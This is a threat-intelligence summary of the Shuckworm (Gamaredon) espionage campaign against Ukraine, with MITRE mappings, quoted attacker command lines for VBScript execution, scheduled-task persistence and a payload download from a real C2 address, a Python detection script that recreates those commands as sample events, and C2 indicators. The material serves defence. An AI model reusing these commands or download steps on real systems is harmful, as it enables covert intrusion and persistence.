Shuckworm (Gamaredon) continues its Ukraine-focused cyber-espionage campaigns, using phishing and living-off-the-land techniques to deploy backdoors and remote-access tools. Symantec’s investigation documents a multi-stage July–August 2021 operation in Ukraine, featuring VBScript backdoors, HTA/mshta usage, and a family of 7-zip dropper binaries that connect to various command-and-control servers. #Shuckworm #Pterodo #UltraVNC #Ukraine
Keypoints
- Shuckworm (Gamaredon) has attacked Ukrainian entities since 2013 with a focus on cyber-espionage.
- The group uses phishing emails to deliver backdoors (Pterodo) or freely available remote access tools (RMS, UltraVNC).
- The Security Service of Ukraine (SSU) reports rising sophistication, including living-off-the-land techniques for credential theft and lateral movement.
- Symantec’s case study (July 14–August 18, 2021) shows an infection chain starting from a malicious Word document via phishing, with VBScript backdoors and a downloaded payload from a remote site.
- Persistence is achieved through multiple scheduled tasks, and attackers abuse mshta.exe to run HTA files, enabling broader script execution and evasion.
- New Pterodo variants and additional backdoors are dropped, with connections to multiple C2s and relays (including VNC components) to maintain control.
- IOC patterns highlight short-lived C2 domains/IPs, a small set of hosting providers, and numerous “d”-prefixed file names in targeted directories.
MITRE Techniques
- [T1566.001] Phishing – The attack chain began with a malicious document, likely sent via a phishing email. ‘The attack chain began with a malicious document, likely sent via a phishing email.’
- [T1059.005] Windows Script (VBScript) – VBScript is used to download and execute payloads via wscript.exe. ‘wscript.exe CSIDL_PROFILE\searches\depended.lnk //e:VBScript //b’ and ‘Two additional VBS scripts are observed being executed via depended.exe.’
- [T1105] Ingress Tool Transfer – The backdoor downloads and executes a payload from a remote server. ‘The backdoor is used to download and execute CSIDL_PROFILE\searches\depended.exe (94a78d5dce553832d61b59e0dda9ef2c33c10634ba4af3acb7fb7cf43be17a5b) from hxxp://92.242.62.131/wordpress.php?is=[REDACTED].’
- [T1053.005] Scheduled Task – The attackers create scheduled tasks to maintain persistence and run dropped scripts. ‘SCHTASKS /CREATE /sc minute /mo 10 /tn “deep-thoughted” /tr “wscript.exe “CSIDL_COMMON_PICTURES\deep-thoughted.ppt” //e:VBScript //b” /F’
- [T1218.005] Mshta – The Mshta utility is used to load and execute remote HTA content, often to bypass controls. ‘Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions.’
- [T1071.001] Web Protocols – The operators use HTTP-based channels to fetch payloads and communicate with C2. ‘download and execute … from hxxp://92.242.62.131/wordpress.php?is=[REDACTED].’
- [T1219] Remote Access Software – A VNC client is dropped and used to connect to a remote C2 server. ‘drop a VNC client and establishes a connection to a remote C&C server controlled by the attackers.’
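The three host-side behaviours in the technique list (a script host forced into VBScript mode on a .lnk/.ppt file, a scheduled task whose action launches that script host, and mshta.exe spawned from a script) are the parts of this chain a detection engineer can turn into process-creation rules. The rules below are an added example written for this page, not Symantec's detection content or anything from the threat actor. The events are constructed Sysmon event ID 1-style records reduced to image, command line and parent image; the CSIDL placeholders from the quoted command lines are resolved to their usual paths, the parent images, the victim user name and the mshta URL (an RFC 2606 .invalid host) are invented, and the benign controls are there only to show what the rules ignore.

```python
"""Triage rules for the Shuckworm process-creation patterns quoted above (added example)."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
ENGINE_OVERRIDE = re.compile(r"^//e:vbscript$", re.IGNORECASE)   # the //e:VBScript switch
TASK_SCRIPT_ACTION = re.compile(r"wscript\.exe|cscript\.exe|mshta\.exe|//e:", re.IGNORECASE)
REMOTE_OR_INLINE = re.compile(r"^(https?://|vbscript:|javascript:)", re.IGNORECASE)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# Constructed sample events: the first three mirror the command lines quoted on this page
# (paths resolved, parents assumed); the last three are benign controls.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\searches\depended.lnk" //e:VBScript //b'},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'SCHTASKS /CREATE /sc minute /mo 10 /tn "deep-thoughted" /tr "wscript.exe "C:\Users\Public\Pictures\deep-thoughted.ppt" //e:VBScript //b" /F'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"mshta.exe http://example.invalid/deep.hta"},   # constructed URL, not a page IOC
    {"image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Scripts\logon.vbs"'},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'SCHTASKS /CREATE /sc daily /tn "Backup" /tr "C:\Tools\backup.exe" /F'},
    {"image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"wscript.exe C:\Scripts\legacy.vbs //e:VBScript"},   # override on a real script file
]


@dataclass(frozen=True)
class Finding:
    technique: str
    rule: str
    detail: str
    severity: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def args_of(cmdline: str) -> list:
    """Split a command line on whitespace, keeping simple double-quoted arguments together."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def rule_engine_override(ev):
    """wscript/cscript told to treat a non-script file as VBScript.
    //e: makes the host ignore the extension, so the backdoor can sit in a .lnk or .ppt."""
    if basename(ev["image"]) not in SCRIPT_HOSTS:
        return None
    args = args_of(ev["cmdline"])[1:]
    if not any(ENGINE_OVERRIDE.match(a) for a in args):
        return None
    targets = [a for a in args if not a.startswith("//")]   # first non-switch token is the file
    script = targets[0] if targets else ""
    if script.lower().endswith(SCRIPT_EXTS):
        return None   # override on a genuine script file: unusual but not this pattern
    return Finding("T1059.005", "vbscript_engine_override_on_non_script_file", script, "high")


def rule_task_runs_script_host(ev):
    """schtasks /create whose action launches a script host or mshta.
    Raised to high when the creator is itself a script host: a script installing its own persistence."""
    if basename(ev["image"]) != "schtasks.exe":
        return None
    cl, low = ev["cmdline"], ev["cmdline"].lower()
    if "/create" not in low or "/tr" not in low:
        return None
    action = cl[low.index("/tr") + 3:].strip()   # everything after /tr is the task action and trailing switches
    if not TASK_SCRIPT_ACTION.search(action):
        return None
    severity = "high" if basename(ev.get("parent", "")) in SCRIPT_HOSTS else "medium"
    return Finding("T1053.005", "scheduled_task_launches_script_host", action, severity)


def rule_mshta(ev):
    """Any mshta.exe launch; high when spawned by a script host or given a URL/inline protocol handler."""
    if basename(ev["image"]) != "mshta.exe":
        return None
    args = args_of(ev["cmdline"])[1:]
    detail = args[0] if args else ""
    suspicious_parent = basename(ev.get("parent", "")) in SCRIPT_HOSTS
    severity = "high" if suspicious_parent or REMOTE_OR_INLINE.match(detail) else "medium"
    return Finding("T1218.005", "mshta_execution", detail, severity)


RULES = (rule_engine_override, rule_task_runs_script_host, rule_mshta)


def triage(events) -> list:
    """Run every rule over every event; returns findings in event order."""
    return [f for ev in events for rule in RULES if (f := rule(ev)) is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.technique} {f.rule}: {f.detail}")
```

On the constructed sample the three attack events each produce one finding and the three controls produce none; the engine-override rule deliberately stays quiet when //e:VBScript is applied to a real .vbs file, since the signal in this campaign is the script engine being forced onto a .lnk or .ppt, not the switch itself.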
Indicators of Compromise
- [IP] context – 92.242.62.131, 168.119.228.72, and other addresses used for C2 or payload delivery
- [Domain] context – arianat.ru, mucoris.ru, deep-pitched.enarto.ru, iruto.ru, deer-lick.chehalo.ru
- [SHA256] context – 0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137 (descend.exe), 1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f (deep-green.exe)
- [File name] context – depended.exe, deep-sunken.exe, deerbrook.ppt, deep-green.exe
- [URL] context – hxxp://92.242.62.131/wordpress.php?is=[REDACTED], hxxp://avirona.ru/7-ZIP.html, hxxp://168.119.228.72/crawled.php